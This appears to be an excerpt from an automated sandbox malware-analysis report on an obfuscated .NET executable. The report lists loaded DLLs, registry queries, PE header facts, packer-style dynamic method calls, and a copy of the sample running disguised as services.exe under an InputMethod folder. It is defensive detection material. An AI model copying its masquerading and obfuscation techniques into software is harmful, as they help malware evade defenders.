                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: midimap.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: XNPOazHpXF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: XNPOazHpXF.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: XNPOazHpXF.exeStatic file information: File size 10393088 > 1048576
                              Source: XNPOazHpXF.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3b6a00
                              Source: XNPOazHpXF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.cs.Net Code: Type.GetTypeFromHandle(SnSyT2mpttk54uGLHux.c9ThURlkHyL(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(SnSyT2mpttk54uGLHux.c9ThURlkHyL(16777246)),Type.GetTypeFromHandle(SnSyT2mpttk54uGLHux.c9ThURlkHyL(16777260))})
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF849177AAA pushad ; retf 0_2_00007FF849177AAB
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF849176C30 pushad ; ret 0_2_00007FF849176C31
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 0_2_00007FF8491760B0 push edi; retf 0_2_00007FF8491760B6
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84902C29C push esp; retn 0000h7_2_00007FF84902C29D
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84902C114 push edx; retn 0000h7_2_00007FF84902C299
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8490227A5 push eax; retf 7_2_00007FF8490227C9
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84902CFE4 pushfd ; iretd 7_2_00007FF84902CFE5
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF849196C30 pushad ; ret 7_2_00007FF849196C31
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF8491960B0 push edi; retf 7_2_00007FF8491960B6
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF849196C8B pushad ; ret 7_2_00007FF849196C90
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84988E2AC push ecx; iretd 7_2_00007FF84988E2AD
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84988E1E9 push ecx; iretd 7_2_00007FF84988E1EA
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84988D118 push eax; retf 7_2_00007FF84988D119
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84988794D push ebx; retf 7_2_00007FF84988796A
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF84988C030 push edx; iretd 7_2_00007FF84988E13F
                              Source: XNPOazHpXF.exe, cbdOpKIrUoaINXV1ASN.csHigh entropy of concatenated method names: 'EjWPvKh9DX', 'd6HPuWDGRj', 'n5rPhiuwvE', 'SdJPMKudLD', 'UgwPJqHiao', 'lHoqtUu8tdkunZdq5maN', 'EBU57Yu8cNmg2X7Lj8ed', 'K2MZ4lu8x00aMMxKZ8Rj', 'nUTZDXu8ASf64hoY7AY4', 'bZicqYu8elBN2bPpX1B5'
                              Source: XNPOazHpXF.exe, zfd7KNhuTXkUaZfAMjZ.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'G4iutLEI1My', 'a7auMsJJh6J', 'k6v1uMuk2F5Y1cNEBmuK', 'a7gYuiukY00VdZF0NSOn', 'd5VxIjuk7Ab0CEsskxW6'
                              Source: XNPOazHpXF.exe, H2MUnjpWoKk4Cs0PTo.csHigh entropy of concatenated method names: 'ofeYPlyZy', 'TkNVwFuODHfml6GBAHMB', 'egeZQFuOyDsThRT76E3d', 'Ukg9vtuORJLHgUAfNU9d', 'kIOnbauOqh9QQwTWyhVv', 't86gbs2dU', 'o6hLbq4s0', 'P6YnOh1tw', 'HeP3EM4ja', 't7Q5YWyu8'
                              Source: XNPOazHpXF.exe, dijOOTEr6fVxwjITriy.csHigh entropy of concatenated method names: 'OqaRhv5Aau', 'Xd0RMmd8VK', 'VedWhOuyfAVdSkW3Py7p', 'tgY8JAuyaWxJKDac8Qh8', 'OFtjq8uyo81CK7tILHIx', 'OePamwuyjEBf2ZOyakNm', 'wIZbUNuy82POkGKedmrh', 'oeFu2wuyT0V1Rhy2mGFd', 'qJbRvL4PRi', 'GYZhF1uyQSO4QRFXl3f5'
                              Source: XNPOazHpXF.exe, pdZ8hVkM7F4UMGa7J5E.csHigh entropy of concatenated method names: 'BpBkUiViT7', 'jc0kcL1juP', 'FKwkxP9ObS', 'BbgktroUNi', 'nuGkAsw4TU', 'P8TnFtulMXamGeY8Tn5E', 'nZpwdhuluYvCIr8ReJrj', 'p1ZP0QulhPdEuri7ph0O', 'TbDS2CulJQKljJ97Zt99', 'eWxk6dulUbLrGshYfsr0'
                              Source: XNPOazHpXF.exe, ON5akxo0SqGPAVt9jj7.csHigh entropy of concatenated method names: 'wgQoL3bI3D', 'WM8onqmHVk', 'rB9o3jfJ7D', 'ntmo5pNt6B', 'MDgob6Za1C', 'MstoirQQUp', 'XXUoBuL3y2', 'GbeoOW8Ygt', 'KrvoGV5WPZ', 'CFLokRTFbT'
                              Source: XNPOazHpXF.exe, xwCCVLht74n63its1JJ.csHigh entropy of concatenated method names: 'TPsheHRxcj', 'RBLhC0OgnN', 'sEvhWHkwUN', 'yQeti1ukZ854Q8vUoWDQ', 'e7C324ukVqyB03hnLNJJ', 'LRgmg1ukdhM2TBsg4wOm', 'fTkcVbuk9y9cC3w8uDTj', 'dDHlMSuklQYmLyOo7BaU', 'G8X7bZukwbZmEO8VcfNd', 'VoMDiBukH7sukthDlwcv'
                              Source: XNPOazHpXF.exe, qpUKl2mdYQoKn7XgOck.csHigh entropy of concatenated method names: 'ncpucwbDyxM', 'PrjucHssDIX', 'WXcucsYWQVV', 'IILucFfCb12', 'PCjucXmIBpN', 'ObPucEn8QMY', 'a5oucR65F6R', 'RaxrAhWZ7f', 'EBpucqdCOTu', 'hvBucDw6HWN'
                              Source: XNPOazHpXF.exe, j7dPdksDHfhGN0BFbiJ.csHigh entropy of concatenated method names: 'V9pFWWjEfx', 'Ns6EPEuqIQoTwWwSthQg', 'uLbY61uqPx2nvrnQ9wyZ', 'Q4l0p3uq6Ax64mMwgJuQ', 'UnGXXSuq4bAvhNFCljYH', 'l1oY4kuqKfUPCRvjjair', 'CPX', 'h7V', 'G6s', '_2r8'
                              Source: XNPOazHpXF.exe, jgOgrVhggJGscfHIBP2.csHigh entropy of concatenated method names: 'SGxhnJnDiY', 'ogSh3W85Ax', 'Rsqd2YuNuyZ8F8d9kTPp', 'ojeoVbuNhto4CG0dhJ1I', 'Jnaqe7uNMTeEYtVc5gYd', 'dvImleuNJGhLXVDKQ2mv', 'OXrIKAuNUebTSxP6EKFt', 'H3BNswuNcuUBgSk9ZC82', 'GPetP2uNx3iKxTkt41mn'
                              Source: XNPOazHpXF.exe, esGy23twwXmsEl5BorN.csHigh entropy of concatenated method names: 'JN6tR7yvNe', 'EFYtqUUWAo', 'vIetD7usmw', 'PLZtyBFL0H', 'FqKtmGFJWO', 'qsptrYtVsy', 'DxNtzVDV3X', 'Tpqp2ju7GboEO8DOChxO', 'k7JZhXu7kXXCTFNfKkI9', 'eNFUI0u7B20agWmMjxJA'
                              Source: XNPOazHpXF.exe, d0a4ArIgcHd0OMHoHJU.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'UdOIn0JvuN', '_947', 't4NI3chrWd', 'L2ZI5Q8MUH', '_1f8', '_71D'
                              Source: XNPOazHpXF.exe, tQPBUNhPNtmdwnwa59b.csHigh entropy of concatenated method names: 'BqFhpTG8Rw', 'usSh0VBG5f', 'ek2swXukqmsYtEbw3K1B', 'YICFWdukEpeZlpxExRVL', 'znO17DukR0hfmHIvClhb', 'lAsB4EukDdMeoUSR90OF', 'W60UBguky7EIUuV9MKGC', 'L7TJSbukmn96iissdvNN', 'bb2pXDukrhIafcdltX3I', 'De9vsEukzNummoJPsVLs'
                              Source: XNPOazHpXF.exe, mOSwksYwgSyd4X67bgR.csHigh entropy of concatenated method names: '_25r', 'h65', 'FuFYsamCBt', 'X8rYFI1HS1', 'cTMYX2alO9', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                              Source: XNPOazHpXF.exe, TicH4FX6BtM0nikAtBj.csHigh entropy of concatenated method names: 'rh0uco9Ox7d', 'TDvucfSVZRj', 'GeJucj186Lr', 'OTU9eruDY2ZJpsPuhaDP', 'UOAZXxuDQpnKkdvj74Hi', 'ghh2p2uD2sLQCtc31ALY', 'BOjutl0U5RM', 'TDvucfSVZRj', 'awg0hxuDfikbkmGc9W4H', 'gJgvWLuDaMPalMGGdGtT'
                              Source: XNPOazHpXF.exe, hgA3VyAzjCNxMVUoFxj.csHigh entropy of concatenated method names: 'aGiecJ4744', 'GpW7riuajod462ooRvtt', 'AYQlPWua8LnoTeCEbhMh', 'hmjTy4uaTbiEY6w85xFB', 'yjrFj5uaVMVJwlDbMJ6y', 'eq7', 'd65', 'CeYuJn3CewB', 'oK4uJ3fFmeI', 'UDYut1tj6Hd'
                              Source: XNPOazHpXF.exe, x4H7Xpph58a9GXXMVqh.csHigh entropy of concatenated method names: 'yEApp8m09o', 'NcRpgURGaE', 'L3IpJCwpwe', 'M1WpU7ftcb', 'WbTpcPo0wn', 'B5RpxrHfK3', 'LTwptB7juy', 'qE2pAyy3XF', 'eFepe06KZh', 'JJYpCBIDHZ'
                              Source: XNPOazHpXF.exe, coGN5tpBHbtUXDSs7MN.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                              Source: XNPOazHpXF.exe, hCCD1vMwwNjvJXU1Yp7.csHigh entropy of concatenated method names: 'SVSMX3Fpni', 'nwhJQAuS7mHDNPbRB4SS', 'lyC8eKuS2fwKUFYrW06Q', 'UUXhw6uSY1LDoBEHNPZ2', 'kRW0xquSajSNsKAAXLPP', 'JNfMsmIdLW', 'n5lG68uSksFSTvrApoRA', 'z4YWfjuSNNCujJtIAiWs', 'cUges1uSSbf3e2rYMqTr', 'gV9vJiuSOjrRuWbJGKV2'
                              Source: XNPOazHpXF.exe, EpTt69F1u2g7dRIAqhq.csHigh entropy of concatenated method names: 'VYMFYMbctt', 'hRWFfKKFTo', 'KsxFT1GKPu', 'zSAFVnZLmY', 'fmKFd4TY8f', 'kGlFZP2LoR', 'VtXF9Lyyd6', 'WunFlVSHuE', '_0023Nn', 'Dispose'
                              Source: XNPOazHpXF.exe, E5KH7mQcdg41ye6m0SU.csHigh entropy of concatenated method names: 'aGnSfYus8nm4NGWfhGRM', 'MfL9q9usfXTDItOWsoAC', 'qv70S8usj0bKgBS8ehSI', 'AHvQtRG5SX', '_1R8', '_3eK', 'OkNQAAPLHU', 'xyeQe4PSuP', 'aZEQCKtIeO', 'LLZQWUjwTh'
                              Source: XNPOazHpXF.exe, eSJIy5eDlFfO6EBZx4M.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'dF0emQXh8M', 'Q12utTnA1QW', 'FrVerbVbu9', 'bpsutVO7qUV', 'pOFpC1uodQoZfe4no4LN', 'Ra5BRxuoTC3XXjI5wbyN', 'PEZZpiuoVdaLY9piwbW7'
                              Source: XNPOazHpXF.exe, NAsqluNj2TUZh7wu1T9.csHigh entropy of concatenated method names: 'xcJNTaumy7', 'f3UNVZCJZe', 'FV7NdRcl6v', 'FZcNZrrx1X', 'omtN9OWnTl', 'NThNlCoKJA', '_4tg', 'wk8', '_59a', '_914'
                              Source: XNPOazHpXF.exe, YRgwQ4U6uuIpHGoRAdj.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'csEutnxUVCw', 'NSGuMzX8loE', 'Y0UjSTuQ64kEHVTLtCrP', 'G7UOR1uQ4aqZ127XFMmg', 'IvcPmquQI9wZSrNNRLBe', 'aj6crduQPomMnGR4t9oZ', 'vIpkZMuQKDosMvaVCaiy'
                              Source: XNPOazHpXF.exe, Tgu4DRMmlug3KkfjUeO.csHigh entropy of concatenated method names: 'O6BJIsJXx7', 'mDT3cnu1WRoDuV5apbFw', 'nPE9VRu16qOcPhoSXJGA', 'c2WjO2u1e0ZYULLEmL0J', 'jWrBX1u1CXWQgfLObLaS', 'JvlWdFu1KHMNcfon2q7y', 'yZfKG8u1I6YLaoDnEj8e', 'jZWqS7u1P6wTCgEmseLa', 'ksOJ5oyRiw', 'xcMPg3u1LRkgu11h4c3b'
                              Source: XNPOazHpXF.exe, DBpg1eA55PfKlq79xCO.csHigh entropy of concatenated method names: '_64Z', 'd65', 'GRHutBKXyOJ', 'vRQuJvnwlZ5', 'hHEAilsNpW', 'uBpeIpu7q51O45QeSKrw', 'silmODu7D37D90L7GxGG', 'nKcTbhu7yT6ESYTwhh2s', 'cyjOQZu7mYk8OCjWT0gM', 'YwOFSou7rp4XpnZu5sEV'
                              Source: XNPOazHpXF.exe, LSwsDYhdUvZ2YLYywRM.csHigh entropy of concatenated method names: 'kSMhmJ1nlo', 'l1lhrKGAgx', 'RBjhzwXAMY', 'RATM5cuNjsrpIQ1Z5hnN', 'OTuKpQuN8OJKnAitavAS', 'Ynh5rduNo0gQRLRAGvio', 'zacd5PuNf3Yg1j49c6ZD', 's9VMUrKtZD', 'R076hyuNZ1H6FnfPZKIw', 'yh9SIZuNVb4rdZsIhLDl'
                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.csHigh entropy of concatenated method names: 'gDKpIFum5CBXOpXgDnnK', 'TPQCrkumbXov85KpSpNM', 'y33yyvfgjR', 'kBqSngumG4nWPaGieqCP', 'JQ4TWaumkQZxyIP7iUmt', 'iv5OxGumNv5Lxh3jmZvZ', 'akM69mumSnmc7yAQ25PA', 'RCEGtWum1Ust3apPqYPu', 'SXKZtmumQCAD0ZwDlAx6', 'GicdLKum2iY4mGMHqK85'
                              Source: XNPOazHpXF.exe, Hn9FFScZ7uouataH78v.csHigh entropy of concatenated method names: 'VKZxvuDwcE', 'BmLxuigJyN', 'alaxh03xVW', 'pA1sScu2HKLjxuoJlo9m', 'N3E81su2laQv0C2Derg9', 'EfRtRCu2w9ZnPd1jCaFT', 'Ka1clTHF1c', 'zyrcwTZew7', 'YwAcH74Bs2', 'CgpcsrwnMw'
                              Source: XNPOazHpXF.exe, wYeZQYkXE2Z2gCnaZiE.csHigh entropy of concatenated method names: 'IcCkRhDbIh', 'PbRkqn03Mn', 'YGakD2jgk1', 'JBDky6C7fC', 'h5CkmD189E', 'rRAkrtx9eE', 'SFPkzAK0hV', 'CtbNvghdjY', 'c4LNuEyNTS', 'U3yNhfaWuY'
                              Source: XNPOazHpXF.exe, dG49pIm3px5qZriOuaw.csHigh entropy of concatenated method names: 'YHcm2I1E6u', 'uArmYahI19', 'ctRm7V8Tc4', 'mw3maErtXQ', 'YeImo56dJB', 'AYRmf0uHrv', 'r3YmjqH5Bw', 'S2bm8MrNsT', 'FGmmT0gSJ8', 'pjFmVYvn5E'
                              Source: XNPOazHpXF.exe, XMxRQdUJqChaOUDICOg.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'RefUc9xvra', 'dWcUx2vbBe', 'nobUtEtExU', 'oiA4Opu1zd1FgdZFaXT3', 'nIISu9uQvmZrHh3HGIBd', 'wCGxjduQufJ9pp6fm7nJ', 'RfZt1FuQhV1HuC1ssyaG', 'VYaJ7huQMkgB1uIDnhvS'
                              Source: XNPOazHpXF.exe, YoG5SaUloXTlXR0VcGu.csHigh entropy of concatenated method names: 'j9SUyi9CsV', 'YNxUmmOfiA', 'Vgn0DQuQZoeyfm84nGW6', 'Pt0aANuQVMcoL1ZXrUf7', 'HcIZqfuQdIFgCNiZFVya', 'Fa49jtuQ9gMU2isUASJi', 'TRtcuFhXCQ', 'SYHkywuQsbUjICiiZI6C', 'XYLicQuQF58ZDaAFedbE', 'JLbcjeuQwjMIBJR7fBO2'
                              Source: XNPOazHpXF.exe, i1Y3IjA12bNYqyFYXpe.csHigh entropy of concatenated method names: 'bRkA8uaQbG', 'Iwhfnuua4p1KrXTwt7Nx', 'guIhUkuaWSqQP50O4O34', 'b1EkLCua6XD3j8cFxkYO', 'bssSmjuaInuLBaFtEJHJ', 'UU8', 'd65', 'rjQuJ4AyfDY', 'aH1uJIFhqCq', 'b3lutGaQp1t'
                              Source: XNPOazHpXF.exe, zryUXUEJJJhkcm1VRu8.csHigh entropy of concatenated method names: 'NOsEcRtE82', 'yQEExHYimq', 'LmhEtvkUvX', 'WWOEAvCqAr', 'XCnEeNDoFi', 'NY3ECFT1Zj', 'huOEWND6vU', 'eUAE6OAvwU', 'bwAE4DrYqn', 'hoUEITXFlw'
                              Source: XNPOazHpXF.exe, DC1FRrx2FPS9BBG3JCh.csHigh entropy of concatenated method names: 'nFQxlCEB2F', 'cp3xw2UdHn', 'TiZxH1tTXD', 'DVfmx7uYkjoGXP3wR076', 'lOOw2TuYOdKUk0pQ3cpl', 'mkRoFAuYGjtlUi5TBqnx', 'YEGx7eqBWY', 'bHJxa8BgGm', 'M41xo4lfIW', 'VW9xfLV7eM'
                              Source: XNPOazHpXF.exe, BvpRB4hSntUXSKfMeX1.csHigh entropy of concatenated method names: 'kKvh8KlO7N', 'q4VSfJuN0nSdY3Nx363Q', 'qS3KAuuNgt73WDZmn9ft', 'CLaHVsuNKXmLWmSJpGxc', 'oILrxquNpI3uPn2vbkre', 'NeVr60uNL15UsRXC4jko', 'sAyacPuNnmypxp1AS6qJ', 'eGZhQPck1Y', 'nZyh2V2Oa1', 'O35hYL27jc'
                              Source: XNPOazHpXF.exe, gZm3OkeP95HTWXUmtdu.csHigh entropy of concatenated method names: '_5t1', 'd65', 'khUuJOSAloN', 'rhruJG7xwvi', 'ogeepBkgcg', 'zTtut2ly3mc', 'vRQuJvnwlZ5', 'nryEJ6uaRDPiGOW7J0AT', 'cEoRRtuaqTjtqKUcODsE', 'Pe2OayuaD021LyhUULlI'
                              Source: XNPOazHpXF.exe, xYxAXE259okGADyhM0f.csHigh entropy of concatenated method names: 'xYWYPtOxi8', 'dpncuuuszOQTTjhEG5LW', 'sfK4V6usmIvYwEOGfTCD', 'bFsFHMusrnOhGInoderQ', 'pyIhFouFvPARS4soo7EJ', 'i5X', 'xVh2iEECh5', 'W93', 'L67', '_2PR'
                              Source: XNPOazHpXF.exe, rGZdWfRWKwAga7ZHo1f.csHigh entropy of concatenated method names: 'gYZR4UjrPI', 'LN3RIMO5RS', 'DXORP2pUXO', 'Q2LRKot1sg', 'Gg1RpXkkxI', 'QU4R03xK5o', 'MUClDuuyH11E4S23nAwr', 'NkRHGauysIDoo5DHheuO', 'yycSneuyFxVFS202gNL7', 'e3492huyXSAGwg2sGgCZ'
                              Source: XNPOazHpXF.exe, AdchQ56dWG23gGLEnWJ.csHigh entropy of concatenated method names: 'cSo69RVxU6', 'qVa6l1J1QT', 'lAi6wU5Ink', 'Al66HZ0EbL', 'DpF6sve7FG', 'UI5920ujJla51bmZ6QuO', 'M0jrLOujhu13BERg8qQP', 'BthBKoujM7K5vGfFXG00', 'uDRpMMujUFL9B9Fg6L14', 'aCaCMdujcBSh9atteqq1'
                              Source: XNPOazHpXF.exe, eMVMJpeARvINb7bH25y.csHigh entropy of concatenated method names: 'O0ee48ttGV', 'Wa76TnuaFUFvFbDWtOSx', 'jWOFS2uaHQOYGN5UtXUJ', 'LdQ9lIuasaorJ6nsSR3w', 'SqdSh1uaX954E88r6bJU', '_53Y', 'd65', 'U58uJbdfZkP', 'yaluJi1rUVc', 'sNEutQ65U9I'
                              Source: XNPOazHpXF.exe, jI2qHHxbkTSckPff6GX.csHigh entropy of concatenated method names: 'oLqxSMgION', 'R5D9tWuY65WPnsXNmYX4', 'fkZs3guY49xnZ7lvndyb', 'GFZ4C2uYCRgcQoOfAPCq', 'OWI1rLuYWRZmobJeIuXf', 'iAbfeYuYIRFpy6MdGlNs', 'WTaxBocwbj', 'LAxWsUuYJB5ILHvX7eHY', 'zYU4CYuYUMBlGO1bHQ4L', 'L8MwURuYcibqS67xcrG7'
                              Source: XNPOazHpXF.exe, U73r8HAd74U79vE2wO8.csHigh entropy of concatenated method names: 'IDV', 'd65', 'JBwutkNG8o3', 'vRQuJvnwlZ5', 'jAQA9KFS8o', 'Y09M5vuaK8cDcucEXtYa', 'B7jE1cuap0UFosFt27Xy', 'lrELI6ua01a0d26h3wN1', 'tCrcTZuagofOnM5X4pGS'
                              Source: XNPOazHpXF.exe, bltyesAROIBJa8qFOnC.csHigh entropy of concatenated method names: '_46E', 'd65', 'VTKAD9TH8O', 'XwautS2kvyN', 'vRQuJvnwlZ5', 'Xw8Ay2pBvB', 'CEKxR6uakuLtwpXjuBrj', 'DN7U1KuaNnA3vfMMTmik', 'rG1O4RuaOM5gocvLAxnS', 'Pss8RruaGJYicNld7gRJ'
                              Source: XNPOazHpXF.exe, Y3dcjJ7trhieYAAnd0y.csHigh entropy of concatenated method names: 'Hta7enLOpd', '_64r', '_69F', '_478', 'e9B7CkWy9Z', '_4D8', 'Llr7W1LO9w', 'lw076wy1iF', '_4qr', 'zYe74tOB46'
                              Source: XNPOazHpXF.exe, CbWsPiJ8E33NPJ4SYPS.csHigh entropy of concatenated method names: 'lFxJHfk8it', 'XAddAiu19I3KvFBBPKOs', 'rn7Xmuu1liJ6FL3GljIH', 'okuB1ru1wO7bNrap8e09', 'D4oJVw7Vns', 'ubHJdx5hh9', 'b2PJZo26oK', 'Doluuyu1VjgQCIgWa286', 'sQ15qZu1do1KatOpdYWk', 'Yv2rIcu18m3N5r0xFRVw'
                              Source: XNPOazHpXF.exe, xqh8PHoT5nJ8cB8mx2c.csHigh entropy of concatenated method names: 't8Fod9LVX6', 'SYwoZAUWbe', 'LLDo9VufEp', 'QQwolfM9Sa', 'bs2owS8u3g', 'FTNoHLuqVG', 'UQQoskTHfL', 'KkGoFynjUw', 'lGKoXloCIK', 'xP9oEcdQJb'
                              Source: XNPOazHpXF.exe, OvC2plefEReZidZ1c6Z.csHigh entropy of concatenated method names: '_2SY', 'dnbutaCVoqP', 'fO3e8p9uF9', 'sZSutopKfjG', 'g51YHeuo3VWlHOArur5s', 'T0kgCFuo5kHRSDQiW8hU', 'gtGd5NuoLlXKt9W8clZS', 'ryBGq2uonB1O8MDRLcsS', 'udvjbruobUwaDPMJfmpH', 'xZGsBXuoit37u0FJEcCO'
                              Source: XNPOazHpXF.exe, Gl9CypMK8MMZJFt4VL4.csHigh entropy of concatenated method names: 'Q8IMk8kBs3', 'gpqMNPgEkG', 'larMSCliit', 'WR2eT2uSInEtBmhYmovE', 'BQWhlVuS6pViOr5bUOA2', 'fE6klLuS4Vm5hT8hysZO', 'oJ8BlJuSPYgs8MhKYB2S', 'jiKMidJYgV', 'BaTMBwTPsg', 'iJCyemuSeMstDJchyZeg'
